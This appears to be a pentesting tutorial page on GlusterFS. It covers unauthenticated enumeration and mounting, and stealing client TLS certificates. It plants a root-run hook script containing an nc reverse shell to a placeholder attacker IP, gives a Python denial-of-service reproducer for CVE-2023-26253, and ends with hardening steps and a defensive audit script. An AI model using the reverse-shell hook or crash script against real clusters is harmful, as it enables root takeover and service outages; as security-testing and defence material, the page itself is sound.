# 24007-24008-24009-49152 - Pentesting GlusterFS

{{#include ../banners/hacktricks-training.md}}

## Basic Information

**GlusterFS** is a **distributed file system** that aggregates storage from multiple servers into a **single unified namespace**. The management daemon (`glusterd`) listens by default on **24007/TCP** and orchestrates the data-plane bricks, which start at **49152/TCP** (one port per brick, incrementing). Versions before 9.x used **24008–24009/TCP** for brick transport, so you will still see those ports in legacy clusters.

```
PORT      STATE SERVICE        VERSION
24007/tcp open  glusterd       GlusterFS (RPC)
49152/tcp open  gluster-brick  SSL (TLS optional)
```

> Tip: 24007 answers RPC calls even when the storage nodes **export no volumes**; this makes the service a reliable target inside large infrastructures.

## Enumeration

Install the client tools on your attack box:

```bash
sudo apt install -y glusterfs-cli glusterfs-client   # Debian/Ubuntu
```

1. **Peer discovery & health**

```bash
# List peers (works without authentication in default setups)
gluster --remote-host 10.10.11.131 peer status
```

2. **Volume reconnaissance**

```bash
# Retrieve the list of all volumes and their configuration
gluster --remote-host 10.10.11.131 volume info all
```

3. **Unauthenticated mount**

```bash
sudo mount -t glusterfs 10.10.11.131:/ /mnt/gluster
```

If the mount fails, check `/var/log/glusterfs/-.log` on the client side. The usual causes are:

* TLS enforcement (`option transport.socket.ssl on`)
* Address-based access control (`option auth.allow `)

### Certificate recovery

Grab the following files from any authorised client node and place them in `/etc/ssl/` (or in the directory named in the error log):

```
/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca
```

---

## Known Vulnerabilities (2022-2025)

| CVE | Affected versions | Impact | Notes |
|-----|-------------------|--------|-------|
| **CVE-2022-48340** | 10.0–10.4, 11.0 | Use-after-free in `dht_setxattr_mds_cbk` reachable over the network | Remote **DoS** and potential RCE. Fixed in 10.4.1 / 11.1. |
| **CVE-2023-26253** | < 11.0 | Out-of-bounds read in the FUSE notify handler | Remote crash via crafted FS operations; public PoC available. |
| **CVE-2023-3775** | < 10.5 / 11.1 | Incorrect permission validation when mounting `gluster_shared_storage` | Lets any unauthenticated client mount the admin volume, leading to the **priv-esc** described below. |

> Always check `gluster --version` **on every node**; mixed clusters are common after partial upgrades.

### Abusing `gluster_shared_storage` (Privilege Escalation)

Even on recent versions, many administrators leave the special `gluster_shared_storage` volume readable by everyone because it simplifies geo-replication. That volume contains cronjob templates that run as **root** on every node.

```bash
# 1. Mount admin volume anonymously
mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss

# 2. Drop malicious script that gets synchronised cluster-wide
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
#!/bin/bash
nc -e /bin/bash ATTACKER_IP 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/test.sh

# 3. Wait until glusterd distributes the hook and executes it as root
```

If `hooks/1/` does not exist, look under `/ss_bricks/` – the real path can differ between major versions.

### Denial-of-Service PoC (CVE-2023-26253)

```python
#!/usr/bin/env python3
# Minimal reproducer: sends malformed NOTIFY_REPLY XDR frame to 24007
import socket, xdrlib, struct

p = xdrlib.Packer(); p.pack_uint(0xdeadbeef)
with socket.create_connection(("10.10.11.131", 24007)) as s:
    # RPC record marker: last-fragment bit | fragment length
    s.send(struct.pack("!L", len(p.get_buffer()) | 0x80000000))
    s.send(p.get_buffer())
```

Running the script crashes `glusterfsd` < 11.0.

---

## Hardening & Detection

* **Update** – the current LTS is 11.1 (July 2025). All of the CVEs above are patched there.
* Enable **TLS** on every brick (`<VOLNAME>` is a placeholder for the volume being configured):

```bash
gluster volume set <VOLNAME> transport.socket.ssl on
gluster volume set <VOLNAME> transport.socket.ssl-cert /etc/ssl/glusterfs.pem
```

* Restrict clients to CIDR lists:

```bash
gluster volume set <VOLNAME> auth.allow 10.0.0.0/24
```

* Expose the management port 24007 only on a **private VLAN** or through SSH tunnels.
* Watch the logs: `tail -f /var/log/glusterfs/glusterd.log`, and turn on the **audit-log** feature (`volume set features.audit-log on`).

---

## References

* [GlusterFS security advisories](https://docs.gluster.org/en/latest/release-notes/#security)
* [CVE-2023-26253 PoC – github.com/tinynetwork/gluster-notify-crash](https://github.com/tinynetwork/gluster-notify-crash)
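As an added example (not code from the original page or from the GlusterFS project), the following audit script parses the `gluster volume info all` output collected in the enumeration step and flags volumes that lack the `auth.allow` restriction or the TLS options from the hardening section, treating the admin volume `gluster_shared_storage` as high risk. The sample output is constructed, and the `server.ssl`/`client.ssl` names are assumed from the Gluster documentation alongside the page's `transport.socket.ssl`.

```python
# Added audit script (not GlusterFS code): parses `gluster volume info all`
# output and flags the two misconfigurations discussed above.

# Constructed sample in the format `gluster volume info all` prints.
SAMPLE = """\
Volume Name: gluster_shared_storage
Brick1: node1:/var/lib/glusterd/ss_brick
Options Reconfigured:
nfs.disable: on

Volume Name: data
Brick1: node1:/bricks/data
Options Reconfigured:
auth.allow: 10.0.0.0/24
server.ssl: on
client.ssl: on
"""
# First name is the option this page sets; client.ssl/server.ssl is the
# pair documented by the Gluster project for TLS on the I/O path (assumed).
TLS_OPTIONS = ("transport.socket.ssl", "server.ssl", "client.ssl")

def parse_volume_info(text):
    """Return {volume_name: {option: value}} from `volume info` output."""
    volumes, opts, in_opts = {}, {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("Volume Name:"):
            opts = volumes.setdefault(line.split(":", 1)[1].strip(), {})
            in_opts = False          # options come after the brick list
        elif line == "Options Reconfigured:":
            in_opts = True
        elif in_opts and ":" in line:
            key, value = (s.strip() for s in line.split(":", 1))
            opts[key] = value
    return volumes

def audit_volume(name, opts):
    """List findings for one volume; an empty list means nothing flagged."""
    findings = []
    # GlusterFS defaults auth.allow to '*', i.e. any address may mount.
    if opts.get("auth.allow", "*").strip() in ("", "*"):
        findings.append("auth.allow unrestricted: any client can mount")
    if not any(opts.get(k, "off").lower() == "on" for k in TLS_OPTIONS):
        findings.append("TLS not enforced on bricks")
    if name == "gluster_shared_storage" and findings:
        findings.append("admin volume exposed: its hooks run as root on every node")
    return findings

def audit(text):
    return {n: audit_volume(n, o) for n, o in parse_volume_info(text).items()}
```

Feed it the real output with `audit(open("volinfo.txt").read())`; any volume with a non-empty list should be fixed with the `volume set` commands above.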